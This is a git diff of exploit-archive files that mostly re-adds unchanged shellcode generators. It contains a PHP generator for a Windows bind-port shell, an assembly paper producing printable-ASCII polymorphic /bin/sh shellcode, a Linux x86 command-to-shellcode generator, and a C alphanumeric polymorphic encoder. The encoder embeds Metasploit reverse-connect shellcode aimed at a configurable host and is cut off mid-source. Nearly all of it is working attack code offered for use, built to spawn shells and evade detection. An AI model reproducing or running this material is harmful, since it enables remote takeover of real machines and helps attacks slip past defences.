b/platforms/generator/shellcode/13283.php index 2b6395795..e95b6aea2 100755 --- a/platforms/generator/shellcode/13283.php +++ b/platforms/generator/shellcode/13283.php @@ -1,65 +1,65 @@ - http://www.shell-storm.org/shellcode/ -*/ - -function syntax() - { - echo "\nSyntax:\nroot@laptop:/# php ./payload.php \n\n"; - } - -function win32bind($port) - { - if($port > 65535 || $port < 4100){ - echo "Erreur Port\nSelect a port between 4100 and 65535\n"; - return false; - } - - $inser .= "\nchar shellcode[] = \n"; - $inser .= " /* BindPort TCP/$port; Os:XP/SP1; Gen:http://www.shell-storm.org */\n"; - $inser .= "\n"; - - $inser .= " \x22\\x83\\xC4\\xEC\\x33\\xC0\\x50\\x50\\x50\\x6A\\x06\\x6A\\x01\\x6A\\x02\\xB8\x22\n"; - $inser .= " \x22\\x01\\x5A\\xAB\\x71\\xFF\\xD0\\x8B\\xD8\\x33\\xC0\\x89\\x45\\xF4\\xB0\\x02\x22\n"; - $inser .= " \x22\\x66\\x89\\x45\\xF0\\x66\\xC7\\x45\\xF2"; - $inser .= "\\x"; - - $res_port = base_convert($port, 10, 16); - - $length = strlen($res_port)-1; - $i = 1; - - for($idx = 0; $idx < $length+1; $idx++) - { - $i++; - if($i == 4) - $inser .= "\\x"; - - $inser .= $res_port[$idx]; - } - $inser .= "\\x6A\\x10\\x8D\\x55\\xF0\x22\n"; - $inser .= " \x22\\x52\\x53\\xB8\\xCE\\x3E\\xAB\\x71\\xFF\\xD0\\x6A\\x01\\x53\\xB8\\xE2\\x5D\x22\n"; - $inser .= " \x22\\xAB\\x71\\xFF\\xD0\\x33\\xC0\\x50\\x50\\x53\\xB8\\x8D\\x86\\xAB\\x71\\xFF\x22\n"; - $inser .= " \x22\\xD0\\x8B\\xD8\\xBA\\x1D\\x20\\xE8\\x77\\x53\\x6A\\xF6\\xFF\\xD2\\x53\\x6A\x22\n"; - $inser .= " \x22\\xF5\\xFF\\xD2\\x53\\x6A\\xF4\\xFF\\xD2\\xC7\\x45\\xFB\\x41\\x63\\x6D\\x64\x22\n"; - $inser .= " \x22\\x8D\\x45\\xFC\\x50\\xB8\\x44\\x80\\xC2\\x77\\xFF\\xD0\x22\x3b\n\n"; - $inser .= " printf(\x22Length: %d\\n\x22,strlen(shellcode));\n"; - $inser .= " (*(void(*)()) shellcode)();\n\n"; - - return $inser; -} - -if($argc < 2){ - syntax(); - return false; - } - $port = $argv[1]; - echo win32bind($port); - -?> - + http://www.shell-storm.org/shellcode/ +*/ + +function syntax() + { + echo "\nSyntax:\nroot@laptop:/# php ./payload.php \n\n"; + } + +function win32bind($port) + { + if($port > 65535 || $port < 4100){ + echo "Erreur Port\nSelect a port between 4100 and 65535\n"; + return false; + } + + $inser .= "\nchar shellcode[] = \n"; + $inser .= " /* BindPort TCP/$port; Os:XP/SP1; Gen:http://www.shell-storm.org */\n"; + $inser .= "\n"; + + $inser .= " \x22\\x83\\xC4\\xEC\\x33\\xC0\\x50\\x50\\x50\\x6A\\x06\\x6A\\x01\\x6A\\x02\\xB8\x22\n"; + $inser .= " \x22\\x01\\x5A\\xAB\\x71\\xFF\\xD0\\x8B\\xD8\\x33\\xC0\\x89\\x45\\xF4\\xB0\\x02\x22\n"; + $inser .= " \x22\\x66\\x89\\x45\\xF0\\x66\\xC7\\x45\\xF2"; + $inser .= "\\x"; + + $res_port = base_convert($port, 10, 16); + + $length = strlen($res_port)-1; + $i = 1; + + for($idx = 0; $idx < $length+1; $idx++) + { + $i++; + if($i == 4) + $inser .= "\\x"; + + $inser .= $res_port[$idx]; + } + $inser .= "\\x6A\\x10\\x8D\\x55\\xF0\x22\n"; + $inser .= " \x22\\x52\\x53\\xB8\\xCE\\x3E\\xAB\\x71\\xFF\\xD0\\x6A\\x01\\x53\\xB8\\xE2\\x5D\x22\n"; + $inser .= " \x22\\xAB\\x71\\xFF\\xD0\\x33\\xC0\\x50\\x50\\x53\\xB8\\x8D\\x86\\xAB\\x71\\xFF\x22\n"; + $inser .= " \x22\\xD0\\x8B\\xD8\\xBA\\x1D\\x20\\xE8\\x77\\x53\\x6A\\xF6\\xFF\\xD2\\x53\\x6A\x22\n"; + $inser .= " \x22\\xF5\\xFF\\xD2\\x53\\x6A\\xF4\\xFF\\xD2\\xC7\\x45\\xFB\\x41\\x63\\x6D\\x64\x22\n"; + $inser .= " \x22\\x8D\\x45\\xFC\\x50\\xB8\\x44\\x80\\xC2\\x77\\xFF\\xD0\x22\x3b\n\n"; + $inser .= " printf(\x22Length: %d\\n\x22,strlen(shellcode));\n"; + $inser .= " (*(void(*)()) shellcode)();\n\n"; + + return $inser; +} + +if($argc < 2){ + syntax(); + return false; + } + $port = $argv[1]; + echo win32bind($port); + +?> + # milw0rm.com [2009-06-09] \ No newline at end of file diff --git a/platforms/generator/shellcode/13284.txt b/platforms/generator/shellcode/13284.txt index 6fd20ae7d..026c798c8 100755 --- a/platforms/generator/shellcode/13284.txt +++ b/platforms/generator/shellcode/13284.txt @@ -1,103 +1,103 @@ -{========================================================================} -{ /bin/sh Polymorphic shellcode with printable ASCII characters } -{========================================================================} - -A paper by the FHM crew: - -http://fhm.noblogs.org - -Contact us at: - --------------------------------------------- - -sorrow: rawhazard@autistici.org; betat@hotmail.it - --------------------------------------------- - -fhm crew: fhm@autistici.org; freehackersmind@gmail.com - --------------------------------------------- - - -Assembly code for /bin/sh polymorphic shellcode: - -BITS 32 -;assembly code for polymorphic shellcode -push esp ; Put current ESP -pop eax ; into EAX. -sub eax,0x39393333 ; Subtract printable values -sub eax,0x72727550 ; to add 860 to EAX. -sub eax,0x54545421 -push eax ; Put EAX back into ESP. -pop esp ; Effectively ESP = ESP + 860 -and eax,0x454e4f4a -and eax,0x3a313035 ; Zero out EAX. -sub eax,0x346d6d25 ; Subtract printable values -sub eax,0x256d6d25 ; to make EAX = 0x80cde189. -sub eax,0x2557442d ; (last 4 bytes from shellcode.bin) -push eax ; Push these bytes to stack at ESP. -sub eax,0x59316659 ; Subtract more printable values -sub eax,0x59667766 ; to make EAX = 0x53e28951. -sub eax,0x7a537a79 ; (next 4 bytes of shellcode from the end) -push eax -sub eax,0x25696969 -sub eax,0x25786b5a -sub eax,0x25774625 -push eax ; EAX = 0xe3896e69 -sub eax,0x366e5858 -sub eax,0x25773939 -sub eax,0x25747470 -push eax ; EAX = 0x622f6868 -sub eax,0x25257725 -sub eax,0x71717171 -sub eax,0x5869506a -push eax ; EAX = 0x732f2f68 -sub eax,0x63636363 -sub eax,0x44307744 -sub eax,0x7a434957 -push eax ; EAX = 0x51580b6a -sub eax,0x63363663 -sub eax,0x6d543057 -push eax ; EAX = 0x80cda4b0 -sub eax,0x54545454 -sub eax,0x304e4e25 -sub eax,0x32346f25 -sub eax,0x302d6137 -push eax ; EAX = 0x99c931db -sub eax,0x78474778 -sub eax,0x78727272 -sub eax,0x774f4661 -push eax ; EAX = 0x31c03190 -sub eax,0x41704170 -sub eax,0x2d772d4e -sub eax,0x32483242 -push eax ; EAX = 0x90909090 -push eax -push eax ; Build a NOP sled. -push eax -push eax -push eax -push eax -push eax -push eax -push eax -push eax -push eax -push eax -push eax -push eax -push eax -push eax -push eax -push eax -push eax - -Then use nasm on the assembly code (nasm asmcode.s) and print it (echo $(cat ./asmcode) ), you will obtain this output: - --[final code]- -TX-3399-Purr-!TTTP\%JONE%501:-%mm4-%mm%--DW%P-Yf1Y-fwfY-yzSzP-iii%-Zkx%-%Fw%P-XXn6- 99w%-ptt%P-%w%%-qqqq-jPiXP-cccc-Dw0D-WICzP-c66c-W0TmP-TTTT-%NN0-%o42-7a-0P-xGGx-rrrx- aFOwP-pApA-N-w--B2H2PPPPPPPPPPPPPPPPPPPPPP --[/final code]- - -That string is your polymorphic shellcode with printable ascii characters. - +{========================================================================} +{ /bin/sh Polymorphic shellcode with printable ASCII characters } +{========================================================================} + +A paper by the FHM crew: + +http://fhm.noblogs.org + +Contact us at: + +-------------------------------------------- + +sorrow: rawhazard@autistici.org; betat@hotmail.it + +-------------------------------------------- + +fhm crew: fhm@autistici.org; freehackersmind@gmail.com + +-------------------------------------------- + + +Assembly code for /bin/sh polymorphic shellcode: + +BITS 32 +;assembly code for polymorphic shellcode +push esp ; Put current ESP +pop eax ; into EAX. +sub eax,0x39393333 ; Subtract printable values +sub eax,0x72727550 ; to add 860 to EAX. +sub eax,0x54545421 +push eax ; Put EAX back into ESP. +pop esp ; Effectively ESP = ESP + 860 +and eax,0x454e4f4a +and eax,0x3a313035 ; Zero out EAX. +sub eax,0x346d6d25 ; Subtract printable values +sub eax,0x256d6d25 ; to make EAX = 0x80cde189. +sub eax,0x2557442d ; (last 4 bytes from shellcode.bin) +push eax ; Push these bytes to stack at ESP. +sub eax,0x59316659 ; Subtract more printable values +sub eax,0x59667766 ; to make EAX = 0x53e28951. +sub eax,0x7a537a79 ; (next 4 bytes of shellcode from the end) +push eax +sub eax,0x25696969 +sub eax,0x25786b5a +sub eax,0x25774625 +push eax ; EAX = 0xe3896e69 +sub eax,0x366e5858 +sub eax,0x25773939 +sub eax,0x25747470 +push eax ; EAX = 0x622f6868 +sub eax,0x25257725 +sub eax,0x71717171 +sub eax,0x5869506a +push eax ; EAX = 0x732f2f68 +sub eax,0x63636363 +sub eax,0x44307744 +sub eax,0x7a434957 +push eax ; EAX = 0x51580b6a +sub eax,0x63363663 +sub eax,0x6d543057 +push eax ; EAX = 0x80cda4b0 +sub eax,0x54545454 +sub eax,0x304e4e25 +sub eax,0x32346f25 +sub eax,0x302d6137 +push eax ; EAX = 0x99c931db +sub eax,0x78474778 +sub eax,0x78727272 +sub eax,0x774f4661 +push eax ; EAX = 0x31c03190 +sub eax,0x41704170 +sub eax,0x2d772d4e +sub eax,0x32483242 +push eax ; EAX = 0x90909090 +push eax +push eax ; Build a NOP sled. +push eax +push eax +push eax +push eax +push eax +push eax +push eax +push eax +push eax +push eax +push eax +push eax +push eax +push eax +push eax +push eax +push eax + +Then use nasm on the assembly code (nasm asmcode.s) and print it (echo $(cat ./asmcode) ), you will obtain this output: + +-[final code]- +TX-3399-Purr-!TTTP\%JONE%501:-%mm4-%mm%--DW%P-Yf1Y-fwfY-yzSzP-iii%-Zkx%-%Fw%P-XXn6- 99w%-ptt%P-%w%%-qqqq-jPiXP-cccc-Dw0D-WICzP-c66c-W0TmP-TTTT-%NN0-%o42-7a-0P-xGGx-rrrx- aFOwP-pApA-N-w--B2H2PPPPPPPPPPPPPPPPPPPPPP +-[/final code]- + +That string is your polymorphic shellcode with printable ascii characters. + # milw0rm.com [2008-08-31] \ No newline at end of file diff --git a/platforms/generator/shellcode/13285.c b/platforms/generator/shellcode/13285.c index a9931873f..0221f4859 100755 --- a/platforms/generator/shellcode/13285.c +++ b/platforms/generator/shellcode/13285.c @@ -1,73 +1,73 @@ -/** - * - * BlackLight's shellcode generator for Linux x86 - * Tested anywhere, working & NULL-free - * - * Usage: ./generator - * ...and then you've got a ready2inject NULL-free shellcode for the command you like - * - * copyleft 2008 by BlackLight - * < http://blacklight.gotdns.org > - * - * Released under GPL v.3 licence - * - * Greetz to: evilsocket, for the idea he gave me ;) - * Greetz to: my friends, who tested, used and appreciated this code and helped - * me to improve it to what it is now - * Greetz to: my girl, next to me in any moment even if she had no idea - * about what I was doing ^^ - */ - -#include -#include -#include - -char code[] = - "\\x60" /*pusha*/ - "\\x31\\xc0" /*xor %eax,%eax*/ - "\\x31\\xd2" /*xor %edx,%edx*/ - "\\xb0\\x0b" /*mov $0xb,%al*/ - "\\x52" /*push %edx*/ - "\\x68\\x6e\\x2f\\x73\\x68" /*push $0x68732f6e*/ - "\\x68\\x2f\\x2f\\x62\\x69" /*push $0x69622f2f*/ - "\\x89\\xe3" /*mov %esp,%ebx*/ - "\\x52" /*push %edx*/ - "\\x68\\x2d\\x63\\x63\\x63" /*push $0x6363632d*/ - "\\x89\\xe1" /*mov %esp,%ecx*/ - "\\x52" /*push %edx*/ - "\\xeb\\x07" /*jmp 804839a */ - "\\x51" /*push %ecx*/ - "\\x53" /*push %ebx*/ - "\\x89\\xe1" /*mov %esp,%ecx*/ - "\\xcd\\x80" /*int $0x80*/ - "\\x61" /*popa*/ - "\\xe8\\xf4\\xff\\xff\\xff" /*call 8048393 */; - -int main (int argc, char **argv) { - int i,len=0; - char *shell,*cmd; - - if (!argv[1]) - exit(1); - - for (i=1; i + * ...and then you've got a ready2inject NULL-free shellcode for the command you like + * + * copyleft 2008 by BlackLight + * < http://blacklight.gotdns.org > + * + * Released under GPL v.3 licence + * + * Greetz to: evilsocket, for the idea he gave me ;) + * Greetz to: my friends, who tested, used and appreciated this code and helped + * me to improve it to what it is now + * Greetz to: my girl, next to me in any moment even if she had no idea + * about what I was doing ^^ + */ + +#include +#include +#include + +char code[] = + "\\x60" /*pusha*/ + "\\x31\\xc0" /*xor %eax,%eax*/ + "\\x31\\xd2" /*xor %edx,%edx*/ + "\\xb0\\x0b" /*mov $0xb,%al*/ + "\\x52" /*push %edx*/ + "\\x68\\x6e\\x2f\\x73\\x68" /*push $0x68732f6e*/ + "\\x68\\x2f\\x2f\\x62\\x69" /*push $0x69622f2f*/ + "\\x89\\xe3" /*mov %esp,%ebx*/ + "\\x52" /*push %edx*/ + "\\x68\\x2d\\x63\\x63\\x63" /*push $0x6363632d*/ + "\\x89\\xe1" /*mov %esp,%ecx*/ + "\\x52" /*push %edx*/ + "\\xeb\\x07" /*jmp 804839a */ + "\\x51" /*push %ecx*/ + "\\x53" /*push %ebx*/ + "\\x89\\xe1" /*mov %esp,%ecx*/ + "\\xcd\\x80" /*int $0x80*/ + "\\x61" /*popa*/ + "\\xe8\\xf4\\xff\\xff\\xff" /*call 8048393 */; + +int main (int argc, char **argv) { + int i,len=0; + char *shell,*cmd; + + if (!argv[1]) + exit(1); + + for (i=1; i. - - +-----------+ - WORKS CITED - +-----------+ - +--------------------------------------------------------------------------------------------------+ - |Matt Conover, Soren Macbeth, Avri Schneider 05 October 2004 | - |Encode2Alnum (polymorphic alphanumeric decoder/encoder) | - |Full-Disclosure | - | | - |CLET Team. Aug. 2003 | - |Polymorphic Shellcode Engine | - |Phrack | - | | - |Ionescu, Costin. 1 July 2003 | - |Re: GetPC code (was: Shellcode from ASCII) | - |Vuln-Dev | - | | - |rix. Aug. 2001 | - |Writing ia32 alphanumeric shellcodes | - |Phrack | - | | - |Wever, Berend-Jan. 28 Jan. 2001 | - |Alphanumeric GetPC code | - |Vuln-Dev | - |ALPHA3 | - +--------------------------------------------------------------------------------------------------+ -////////////////////////////////////////////////////////////////////////////////////////////////////////////////////// -*/ -#include -#include -#include - -#define MAX_BYTES 0x100 -#define MAX_ENCODED_SHELLCODE 2000 //this will be allocated on the stack -#define MIN_IP_STR_LEN 7 -#define MAX_IP_STR_LEN 15 - -#define OFFSET_XOR_AL1_A 15 -#define OFFSET_XOR_AL1_B 18 -#define OFFSET_XOR_AL2_A 37 -#define OFFSET_XOR_AL2_B 40 -#define OFFSET_PUSH_DWORD1 0 -#define OFFSET_PUSH_DWORD2 1 -#define OFFSET_PUSH_DWORD3 4 -#define OFFSET_PUSH_DWORD4 12 -#define OFFSET_RANDOMIZED_DECODER_HEAD 14 -#define SIZE_RANDOMIZED_DECODER_HEAD 16 -BYTE EncodedShellcode[] = // encoded 336 bytes - "PZhUQPTX5UQPTHHH4D0B8RYkA9YA3A9A2B90B9BhPTRWX5PTRW4r8B9ugxPqy8xO" - "wck4WTyhlLlUjyhukHqGCixVLt4UTCBRwsV3pRod8OLMKO9FXJVTJJbJX4gsVXAt" - "Q3ukAxFmVIw7HyBfDyNv5zXqg4PQeTxZJLm56vRjSidjSz75mHb2RL5Hl30tUmnH" - "HtXEv7oZVdiEv1QwWijcgVk4CZn7NI3uRai32AZ7FS0Iq1cwWc5T5RlnTIiKJVmq" - "4T4MElucobfP4vWyB0OfB34JRJ9T4zjLlbKmlk7jTicj11869F001uAdTZKNJ7wL" - "mOv5mLlGPKFLtNI2525WhktKDO0NIlseHIuJ33xv7xGQAW55eZKXHw78zfvCI2U0" - "9Ulw5ZZhynmxG7JZZgJAYbg1MEp5QcOv7AYkYfcHQDWVMlJnzOSh8nzg1NZZn5Px" - "11U5INVEtvZOS1E094HqmbB6K1MfRIq7KQyNOeL7NHI1Xnwhyhy69bg2bTexGnkc" - "CEt90vn3DaFxGaFuRIPg0NK40kdg0L9ImaFbGy1Wl7JyGeJByHdfRCSYzvCzVa2v" - "RtQWG5lxRMN1CZREvyKFvfwij3X2P81J1wk9ZLmGAqxGPuQv7RBX411iaWKCLGnD" - "kwRZKREaRis5V7c5ILxKfAx6MbH40T53PnX9ZwSWtYzbHwCzkS0Ev5iVmLmS3xSk" - "1telLPYuGyNvX1TyJ3yLdOwckr"; - -// example: make encoder choose more uppercase bytes... -#define ADDITIONAL_CHARSET "ABCDEFGHIJKLMNOPQRSTUVWXYZ" - -#define ALNUM_CHARSET ADDITIONAL_CHARSET "0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz" // <--- allowed charset - // feel free to -//////////////////////////////////////////////////////////////////////////////////////////////////////////////////////change - YMMV -#define REGISTER_WITH_ADDRESS_OF_SHELLCODE esp // <--- change this to the register holding the address of the decoder//////////// -#define _Q(str) #str -#define Q(str) _Q(str) -#define P(str) #str ##" // <--- buffer offset\n"## _Q(str) -/////////////////////////////////// -#define CONNECT_BACK_SHELLCODE // -//#undef CONNECT_BACK_SHELLCODE //undefine CONNECT_BACK_SHELLCODE to use your own - and place it in shellcode[] >-----------------. - /////////////////////////////////////////////////////////////////// | -int main(); // | -UCHAR *scan_str_known_pattern(UCHAR *alnum_str, UCHAR *known_pattern, UINT known_pattern_length); // | -UCHAR get_push_register_instruction(UCHAR *reg); // | -UCHAR get_random_alnum_value(); // | -UCHAR get_random_alnum_push_dword_opcode(); // | -UCHAR *get_nop_slide(UINT size, UINT slide); /////// | -UCHAR *slide_substr_forward(UCHAR *str, UINT substr_offset, UINT substr_len, UINT str_len, UINT slide);// | -UCHAR *slide_substr_back(UCHAR *str, UINT substr_offset, UINT substr_len, UINT str_len, UINT slide); // | -UCHAR *shuffle(UCHAR str[], UINT length); /////// | -DWORD my_htonl(DWORD dw_in); // | -DWORD ip_str_to_dw(UCHAR *str); // | -BOOL terminating_key_exist(UCHAR *alnum_shellcode, UCHAR *terminating_key); // | -BOOL is_alnum(UCHAR c); // | -BOOL str_is_alnum(UCHAR *str); // | -UCHAR get_two_xor_complemets_for_byte_and_xor(UCHAR byte, UCHAR xor, int index); // | -UCHAR *randomize_decoder_head(UCHAR *decoder, UINT size_decoder, UCHAR xor_al1, UCHAR jne_xor1); // | -struct xor2_key *get_xor2_and_key_for_xor1_and_c(UCHAR xor1, UCHAR c); // | -struct xor2_key *choose_random_node(struct xor2_key *head); // | -void free_p_xor2_key(struct xor2_key *node); // | - // | -struct xor2_key { // | - UCHAR xor2; // | - UCHAR key; // | - struct xor2_key *prev; // | - struct xor2_key *next; // | -} xor2_key; // | - // | - // | -// Title: Win32 Reverse Connect // | -// Platforms: Windows NT 4.0, Windows 2000, Windows XP, Windows 2003 // | -// Author: hdm[at]metasploit.com // | -#ifdef CONNECT_BACK_SHELLCODE // | - #define OFFSET_IP_ADDRESS 154 // | - #define OFFSET_TCP_PORT_NUMBER 159 // | - #define IP_ADDRESS "127.0.0.1" // | - #define TCP_PORT_NUMBER 123 // | - DWORD ip_address; // | - UCHAR shellcode[] = // | - "\xe8\x30\x00\x00\x00\x43\x4d\x44\x00\xe7\x79\xc6\x79\xec\xf9\xaa" // | - "\x60\xd9\x09\xf5\xad\xcb\xed\xfc\x3b\x8e\x4e\x0e\xec\x7e\xd8\xe2" // | - "\x73\xad\xd9\x05\xce\x72\xfe\xb3\x16\x57\x53\x32\x5f\x33\x32\x2e" // | - "\x44\x4c\x4c\x00\x01\x5b\x54\x89\xe5\x89\x5d\x00\x6a\x30\x59\x64" // | - "\x8b\x01\x8b\x40\x0c\x8b\x70\x1c\xad\x8b\x58\x08\xeb\x0c\x8d\x57" // | - "\x24\x51\x52\xff\xd0\x89\xc3\x59\xeb\x10\x6a\x08\x5e\x01\xee\x6a" // | - "\x08\x59\x8b\x7d\x00\x80\xf9\x04\x74\xe4\x51\x53\xff\x34\x8f\xe8" // | - "\x83\x00\x00\x00\x59\x89\x04\x8e\xe2\xeb\x31\xff\x66\x81\xec\x90" // | - "\x01\x54\x68\x01\x01\x00\x00\xff\x55\x18\x57\x57\x57\x57\x47\x57" // | - "\x47\x57\xff\x55\x14\x89\xc3\x31\xff\x68" // | - "IPIP" // I.P. address // | - "\x68" // | - "PORT" // TCP port number // | - "\x89\xe1\x6a\x10\x51\x53\xff\x55\x10\x85\xc0\x75\x44\x8d\x3c\x24" // | - "\x31\xc0\x6a\x15\x59\xf3\xab\xc6\x44\x24\x10\x44\xfe\x44\x24\x3d" // | - "\x89\x5c\x24\x48\x89\x5c\x24\x4c\x89\x5c\x24\x50\x8d\x44\x24\x10" // | - "\x54\x50\x51\x51\x51\x41\x51\x49\x51\x51\xff\x75\x00\x51\xff\x55" // | - "\x28\x89\xe1\x68\xff\xff\xff\xff\xff\x31\xff\x55\x24\x57\xff\x55" // | - "\x0c\xff\x55\x20\x53\x55\x56\x57\x8b\x6c\x24\x18\x8b\x45\x3c\x8b" // | - "\x54\x05\x78\x01\xea\x8b\x4a\x18\x8b\x5a\x20\x01\xeb\xe3\x32\x49" // | - "\x8b\x34\x8b\x01\xee\x31\xff\xfc\x31\xc0\xac\x38\xe0\x74\x07\xc1" // | - "\xcf\x0d\x01\xc7\xeb\xf2\x3b\x7c\x24\x14\x75\xe1\x8b\x5a\x24\x01" // | - "\xeb\x66\x8b\x0c\x4b\x8b\x5a\x1c\x01\xeb\x8b\x04\x8b\x01\xe8\xeb" // | - "\x02\x31\xc0\x89\xea\x5f\x5e\x5d\x5b\xc2\x08\x00"; // | -#else ////////////////////////////////////// | - UCHAR shellcode[] = "\xCC YOUR SHELLCODE GOES HERE \xCC"; // <----------------- here ------------------------------------------' -#endif // -DWORD size = sizeof(shellcode)-1; // - // -int main() { ///////////////////////////////////////////////////////// - //(decoder address is in ecx when decoder starts) // - UCHAR PUSH_REGISTER_WITH_DECODER_ADDRESS = get_push_register_instruction(Q(REGISTER_WITH_ADDRESS_OF_SHELLCODE)); // >----------. -// // | -#define END_OF_ENCODED_SHELLCODE 'A','L','D','N' // this is the terminating string of the encoded shellcode // | - UCHAR str_end_of_encoded_shellcode[]= {END_OF_ENCODED_SHELLCODE}; //////////////////////////////////////////////// | - UCHAR xor_al1 = get_random_alnum_value(); // this is used to zero out AL the first time | - UCHAR xor_al2 = get_random_alnum_value(); // this is used to zero out AL the second time | - int offset_imul_key = '\xC1';//////////////////////// | - int jne_xor1 = '\xC2';// >---------------------------------------------------------. | - int jne_xor2 = '\xC3';// >--------------------------------------------------------------| | - // you would need to play with these two values if you want to reduce | | - // the size of the NOP slides - they obviously need to stay alnum. | | - // You could also play with the value of AL before the XOR is done | | - // to get your desired negative offset. keep in mind that it will cost | | - // you instructions to get al to the value you want (if you use xor of | | - // two alphanumeric bytes, you would need to push first alphanumeric | | - // char to the stack, pop eax, then xor it with it's alnum complement) | | - // This playing around would result in an even harder to detect decoder | | - // as the offsets would be different | | - int size_decoder ='\xC4'; // | | - int half_size_decoder ='\xC5'; //////////////////////////////////////////////////////////////////// | | - UCHAR imul_instruction_1 ='\x6B'; // | | - UCHAR imul_instruction_2 ='\x41'; // | | - UCHAR imul_instruction_3 ='\xC6'; //size of decoder+1 // | | - UCHAR imul_instruction_4 ='\xC7'; //initial key (random alnum) // | | - // // | | - UINT column=0, i=0; /////////////////////////////// | | - UCHAR *alnum = ALNUM_CHARSET; // | | - UCHAR *p_alnum = alnum; // | | - UCHAR decoder[] = // | | - { //////////////////////////////////////////////////////////////////////////////// | | - // | | - //[step_1] -- multiply first encoded byte with key | | - //[step_2] -- xor result of step_1 with second encoded byte to get the decoded byte | | - // | | - // Each binary byte is encoded into three alphanumeric bytes. | | - // The first byte multipled by the third byte xor'ed against the second byte yeilds the original | | - // binary byte. | | - // | | - // TODO: | | - // .--(first byte ^ second byte) * third byte | | - // '--(second byte ^ first byte) * third byte | | - // | | - // .--(first byte ^ third byte) * second byte | | - // '--(third byte ^ first byte) * second byte | | - // | | - // .--(second byte ^ third byte) * first byte | | - // '--(third byte ^ second byte) * first byte | | - // | | - // .--(first byte * second byte) ^ third byte | | - // '--(second byte * first byte) ^ third byte | | - // | | - // .--(first byte * third byte) ^ second byte <-- decoder/encoder implemented | | - // '--(third byte * first byte) ^ second byte <-- decoder implemented (same encoder) | | - // | | - // .--(second byte * third byte) ^ first byte | | - // '--(third byte * second byte) ^ first byte | | - // | | - // | | - // The above is divided into pairs, each pair has the same values (in parenthesis) just at different offsets, | | - // and we can switch them around with no effect. Each option requires a different decoder, but each pair can use the | | - // same encoder. | | - // | | - /////////// DECODER HEAD (will be randomized by sliding instructions) //////// >----------------------------------|----|---. - /* 1*/ '\x50', //push ??? (this can change) // [eax = address of decoder]------+ | | | - /* 2*/ '\x50', //push ??? (this can change) // [ecx = address of decoder]------+ | | | - /* 3*/ PUSH_REGISTER_WITH_DECODER_ADDRESS, //push reg (decoder address) // [edx = address of decoder]------+ | | | - /* 4*/ PUSH_REGISTER_WITH_DECODER_ADDRESS, //push reg (base offset for cmp) // [ebx = address of decoder]------+ | | | - /* 5*/ '\x50', //push ??? (this can change) // [esp = address of decoder]------+ | | | - /* 7*/ '\x6A', half_size_decoder, //push 35h (word offset for cmp) // [ebp = decoder size / 2]--------+ | | | - /*12*/ '\x68', END_OF_ENCODED_SHELLCODE, //push END_OF_ENCODED_SHELLCODE // [esi = 4 bytes terminating key]>+ | | | - /*13*/ '\x50', //push ??? (this can change) // [edi = address of decoder]------+ | | | - /*14*/ '\x61', //popad // [set all registers] <-----------' | | | - /*16*/ '\x6A', xor_al1, //last decoder byte=0xB1 //push XOR_AL1 [JNE_XOR1^0xFF=al^JNE_XOR2=last byte==0xB1] >----. | | | - /*17*/ '\x58', //pop eax <-------------------------------------------------' | | | - /*19*/ '\x34', xor_al1, //xor al,XOR_AL1 [al = 0x00] | | | - /*20*/ '\x48', //dec eax [al = 0xFF] [you can play with AL here...]<----' | | - /*22*/ '\x34', jne_xor1, //xor al,JNE_XOR1 [al = 0xFF ^ JNE_XOR1] | | - /*25*/ '\x30', '\x42', size_decoder-1, //xor byte ptr [edx+size],al >--change-last-byte--. | | - /*26*/ '\x52', //push edx [save decoder address on stack] | | | - /*27*/ '\x52', //push edx >----. | | | - /*28*/ '\x59', //pop ecx <------' [ecx = address of decoder] | | | - /*29*/ '\x47', //inc edi we increment ebx keeping the decoder | | | - /*30*/ '\x43', //inc ebx length non-even (edi is unused) | | | - //////////////// DECODER_LOOP_START /////////////////////////////////////////// | | | - /*31*/ '\x58', //get address of the decoder //pop eax <---------. <--|-----------------. | | - /*32*/ '\x52', //save edx //push edx [can use edx now]>---------------|----|---------------. | | | - /*33*/ '\x51', //save ecx //push ecx [can use ecx now] >------------|----|-------------. | | | | - /*34*/ '\x50', //save address of decoder //push eax [can use eax now] >---------|----|-----------. | | | | | - /*35*/ '\x50', //save eax //push eax >----. | | | | | | | | - /*36*/ '\x5A', //restore into edx //pop edx <------' | | | | | | | | - /*38*/ '\x6A', xor_al2, //zero out al //push XOR_AL2 [al = 0] >----. | | | | | | | | - /*39*/ '\x58', //zero out al //pop eax | | | | | | | | | - /*41*/ '\x34', xor_al2, //zero out al //xor al,XOR_AL2 <----------' | | | | | | | | - /*42*/ '\x50', //save al on the stack (al=0)//push eax >-----------------. | | | | | | | | - /*45*/ '\x32', '\x42', offset_imul_key, //xor al,byte ptr [edx+off] | | | | | | | | | - /*48*/ '\x30', '\x42', offset_imul_key, //xor byte ptr [edx+off],al >--this-zero's-the-key----. | | | | | | - /*49*/ '\x58', //restore al from the stack (al=0)//pop eax <----------------------' | | | | | | | | | - /*52*/ '\x32', '\x41', size_decoder+2, // get key in al //xor al,byte ptr [ecx+size+2] | | | | | | | | | - /*55*/ '\x30', '\x42', offset_imul_key, //xor byte ptr [edx+off],al >---this-changes-the-key--|----. | | | | | | - /*56*/ '\x58', //restore address of decoder //pop eax <---------------------------------|----|---|----|--' | | | | | - /*57*/ '\x59', //restore ecx [word offset] //pop ecx <------------------------------|----|---|----|----' | | | | - /*58*/ '\x5A', //restore edx [byte offset] //pop edx <---------------------------|----|---|----|------' | | | - /*59*/ '\x50', //save address of decoder //push eax >---------------------------------|----|---|----|--------' | | - /////////// START NOP_SLIDE_1 ///////////////////////////////////////////////// | | | | | | - /*60*/ '\x41',/////////////////////////////////////inc ecx/////////////////////////// | | | | | | - /*61*/ '\x49',/////////////////////////////////////dec ecx/////////////////////////// | | | | | | - /*62*/ '\x41',/////////////////////////////////////inc ecx/////////////////////////// | | | | | | - /*63*/ '\x49',/////////////////////////////////////dec ecx+-----------------------+// | | | | | | - /*64*/ '\x41',// IMUL can go here and bellow //inc ecx| |// | | | | | | - /*65*/ '\x49',// //dec ecx| 16 bytes |// | | | | | | - /*66*/ '\x41',// //inc ecx| NOP slide |// | | | | | | - /*67*/ '\x49',// //dec ecx| |// | | | | | | - /*68*/ '\x41',// //inc ebx| can mungle eax until |// | | | | | | - /*69*/ '\x49',// will be randomized //dec ebx| IMUL_INSTRUCTION |// | | | | | | - /*70*/ '\x41',// //inc edx| |// | | | | | | - /*71*/ '\x49',// //dec edx| |// | | | | | | - /*72*/ '\x41',// //inc esi| |// | | | | | | - /*73*/ '\x49',// //dec esi+-----------------------+// | | | | | | - /*74*/ '\x41',// //push eax/////////////////////////// | | | | | | - /*75*/ '\x49',// //pop eax//////////////////////// // | | | | | | 